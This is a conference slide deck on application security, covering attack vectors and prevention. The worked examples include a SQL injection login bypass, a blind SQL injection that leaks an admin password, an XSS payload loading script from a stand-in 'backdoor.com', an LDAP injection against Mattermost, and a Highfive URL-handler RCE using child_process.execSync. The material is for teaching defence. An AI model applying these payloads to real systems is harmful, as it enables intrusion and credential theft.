Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

AOEconf17: Application Security

545 views

Published on

AOEconf17 talk "Application Security" by Bastian Ike.

Published in: Software
  • Be the first to comment

AOEconf17: Application Security

  1. 1. Application Security AOE Conf 2017
  2. 2. What is
 Application Security?
  3. 3. Application Security • Security in software • Not management security, perimeter security, etc • Possible Attack vectors • How to prevent issues
  4. 4. Attack vectors
  5. 5. Code Execution Make a system execute arbitrary code
  6. 6. Buffer Overflows • Assembler code injected into memory • 1996, Aleph One, "Smashing the stack for fun and profit" • Possible by overflowing a programs memory with controlled data
  7. 7. SQL Injection • Execute arbitrary SQL code • Possible by interpolating user-submitted data without proper escaping • Can be used to read/write files on DB server
  8. 8. Cross Site Scripting • Execute arbitrary JavaScript in a privileged context • Executed on a client's machine • Privileged context: Browser (domain/cookies) • Steal/Modify cookies • AJAX Requests to privileged areas
  9. 9. Cryptography Attack cryptographic measures for confidentiality and integrity
  10. 10. Signatures • Fake signatures/tokens for unauthorised access
  11. 11. Encryption • Break encryption • Missing encryption • Broken Encryption: • Example: Bleichenbacher RSA
  12. 12. Business Logic Make legit code behave in an unintended way
  13. 13. Race Conditions • Re-order execution flows to change an operations result
  14. 14. Exploit basics
  15. 15. SQL Injection • Query: SELECT * FROM users WHERE 
 username="${USERNAME}" AND 
 password="${PASSWORD}"; • Username: Bastian • Passwort: Sesame098 • Query: SELECT * FROM users WHERE 
 username="Bastian" AND 
 password="Sesame098";
  16. 16. SQL Injection • Query: SELECT * FROM users WHERE 
 username="${USERNAME}" AND 
 password="${PASSWORD}"; • Username: Bastian • Passwort: " OR 1=1 -- x • Query: SELECT * FROM users WHERE 
 username="Bastian" AND 
 password="" OR 1=1 -- x";
  17. 17. SQL Injection • Query: SELECT * FROM logs WHERE 
 token="${TOKEN}"; • Token: a" AND IF(SUBSTRING(
 (SELECT password FROM users WHERE name="admin" LIMIT 1)
 ,0,1) = 'a', SLEEP(5), 0) -- x • Query: SELECT * FROM logs WHERE
 token="a" AND IF(SUBSTRING(
 (SELECT password FROM users WHERE name="admin" LIMIT 1)
 ,0,1) = 'a', SLEEP(5), 0) -- x";
  18. 18. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page=hello • Template: <a href="hello">You are here</a>
  19. 19. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page="><script src="http://backdoor.com/x.js"></script> • Template: <a href=""><script src="http:// backdoor.com/x.js"></script>">You are here</a>
  20. 20. Cross-Site Scripting • Code runs in Browser of the one opening the link • Access to Cookies+LocalStorage • Can send requests and read their result (emulate administrator behaviour) • Change page look/behaviour (steal passwords, etc)
  21. 21. Exploits samples
  22. 22. Mattermost LDAP Injection • https://mattermost/api/v3/users/login • login_id: username)(givenName=test* • password: "" • Response: • 401: OK, query successful • 50x: Error, query failed
  23. 23. Mattermost LDAP Injection
  24. 24. Mattermost LDAP Injection
  25. 25. Mattermost LDAP Injection
  26. 26. Mattermost LDAP Injection • Prevention: properly escape characters which might be interpreted by LDAP
  27. 27. Highfive RCE • Target: URL-Handler highfive:// • Possible arguments: ?domain=, ?protocol=
  28. 28. Highfive RCE Privileged Non-Privileged Display Web-pages Execute processes etc Highfive Sandbox (NW.js) Whitelist: https://highfive.com https://dev.highfive.com
  29. 29. Highfive RCE • highfive://test.com.a/? domain=alert(require('child_process').execSyn c('hostname;echo;id').toString())// &protocol=javascript • Starts Highfive on a privileged initial domain • Redirects to: protocol + '://' + domain + path • Becomes: 
 javascript:// alert(require('child_process').execSync('host name;echo;id').toString())//something
  30. 30. Highfive RCE • Redirect to javascript:// does not change the sandbox • Works on any operating system • Thank you JavaScript 😙
  31. 31. Highfive RCE • Prevention: whitelist redirect targets
  32. 32. JWT Null Tokens
  33. 33. JWT Null Tokens
  34. 34. JWT Null Tokens
  35. 35. JWT Null Tokens
  36. 36. JWT Null Tokens • Prevention: Do not allow null signature algorithms
  37. 37. Preventive actions
  38. 38. Finding Security issues • Code Reviews • Curiosity • (sometimes: automated scanners)
  39. 39. Stay up to date
  40. 40. React fast
  41. 41. React fast • Escalation plan for security incidents • Fast deployment strategies • Firewall setup to cut off possible infected systems • Snapshot infrastructure for later analysis
  42. 42. Thank you :) Questions?

×